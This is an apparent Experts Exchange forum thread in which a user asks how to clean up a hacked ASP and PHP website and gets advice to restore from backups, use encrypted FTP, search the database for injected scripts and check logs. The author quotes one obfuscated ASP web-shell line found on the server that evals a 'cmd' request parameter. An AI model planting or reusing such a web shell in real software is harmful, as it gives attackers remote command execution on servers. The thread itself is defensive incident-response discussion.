Cleaning up a hacked website

Posted on 2015-01-15
Medium Priority
Last Modified: 2015-01-22
I've been assigned to clean up a website that's been hacked somehow.

If I understand it correctly, the website runs ASP code (suspect it's not ASP.NET but not sure how to check) connecting to several Access databases. It also has a section of the site using the PHP CodeIgniter framework. It's suspected that the attacker initially gained access through a weak FTP password.

After an initial clean up and a change of the FTP password, more malicious activity was detected. I suppose it's possible the avenue for this attack may have been different to the initial one.

I've found 9 ASP files that are clearly malicious. However, I'm not particularly familiar with the code on the site and am very aware that I'm unlikely to find them all, so I'm trying to get hold of a backup prior to the initial hack, for comparison purposes. If available, I will try to restore the programming files to what was there prior to the hack.

Are there any tools I can use that might detect malicious files with reasonable accuracy? Are there any neat tricks I can use to at least detect malicious behaviour? Is there anything else that would be useful to know or try?
Question by:Terry Woods
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
LVL 12

Assisted Solution

Sommerblink earned 400 total points
ID: 40552054
I wish I could provide clever answers to your questions, but honestly I treat hacked websites/webservers like I treat virused/malware infected computers, wipe and reload the machine and restore from a known good backup.

Once a machine has been compromised, there is no guarantee that you can catch everything and undo the damage.

Good luck!
LVL 34

Assisted Solution

by:Paul MacDonald
Paul MacDonald earned 400 total points
ID: 40552065
Code is code and there's rarely a way to define intent without human intervention.  As it is, your best bet is to restore from a known good backup.  If that can't be done, you'll probably have to go through each page, one-at-a-time.  

Be aware the hacker may have compromised the operating system itself.  This wouldn't normally be possible, but if the web site and/or FTP site were running as users with sufficient permissions, the hacker could have put (or written code to put) files anywhere.
LVL 35

Accepted Solution

gr8gonzo earned 500 total points
ID: 40552171
As a side note - regular FTP is done over plain text. There's no encryption, so anyone that listens to the communication can see the password, no matter how complex / strong it is. Always use SFTP or FTPS (whatever your server supports) for transferring / managing files.

More often than not, hacks are due to vulnerabilities in the code or an unpatched system. Maybe the server hasn't been keeping up with security updates, or maybe you've downloaded some 3rd party code that had a vulnerability in it. For example, PHPMyAdmin was a common script that a lot of people used for years, but there were vulnerabilities in it and people could get hacked just by having it on their web server. There may be ASP equivalents.

ASP.NET code typically is in files with the extension .aspx, while classic ASP uses .asp as the extension.
WatchGuard's M Series Appliances - Miecom Approved

WatchGuard's newest M series appliances were put to the test by Miercom.  We had great results and outperformed all of our competitors in both stateless and stateful traffic throghput scenarios! Ready to see how your UTM appliance stacked up? Download the Miercom Report!

LVL 33

Assisted Solution

by:Big Monty
Big Monty earned 500 total points
ID: 40552204
another place you'll want to check is in your database. if you have any kind of data collection (ex - forms) and you don't sanitize the input, hackers in theory could save malicious html and when that data is written out to the screen, you have been hacked.

do a search in any text or varchar fields in your database on the string "<script" (w/out the quotes) and that'll tell you if any bad scripts have been saved to your database
LVL 35

Author Comment

by:Terry Woods
ID: 40552236
It's pretty much as I thought then. I'm waiting to see what backups I have available. I suspect I may have to retain the current copy of the databases though, so @Big_Monty's suggestion on what to look for in the databases could be very useful.

I thought the contents of this .asp file were interesting:
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%

The characters spell out "request". Would this be malicious by any chance? This particular file was date stamped differently to the other malicious ones I found, but I guess one of the easy hacker tricks would be to encourage the victim to think they have found all the malicious files through date stamping most of them with the date of the hack... anyway, I'm not going to put much more time into trying to find individual files since it's probably a fruitless exercise.
LVL 33

Expert Comment

by:Big Monty
ID: 40552262
most likely that page is a hack as well, do a search for that string and some shady sites come up talking about viruses and trojans....
LVL 53

Assisted Solution

by:Scott Fell, EE MVE
Scott Fell,  EE MVE earned 200 total points
ID: 40558397
It's possible that they used code to create files on the fly.  I would look at the logs too and see if you can find some odd query string requests on a particular page.
LVL 35

Author Closing Comment

by:Terry Woods
ID: 40563794
Thanks all for your help!

Featured Post

What does it mean to be "Always On"?

Is your cloud always on? With an Always On cloud you won't have to worry about downtime for maintenance or software application code updates, ensuring that your bottom line isn't affected.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Recovering from what the press called "the largest-ever cyber-attack", IT departments worldwide are discussing ways to defend against this in the future. In this process, many people are looking for immediate actions while, instead, they need to tho…
The conference as a whole was very interesting, although if one has to make a choice between this one and some others, you may want to check out the others.  This conference is aimed mainly at government agencies.  So it addresses the various compli…
Nobody understands Phishing better than an anti-spam company. That’s why we are providing Phishing Awareness Training to our customers. According to a report by Verizon, only 3% of targeted users report malicious emails to management. With compan…
Sometimes it takes a new vantage point, apart from our everyday security practices, to truly see our Active Directory (AD) vulnerabilities. We get used to implementing the same techniques and checking the same areas for a breach. This pattern can re…
Suggested Courses

801 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question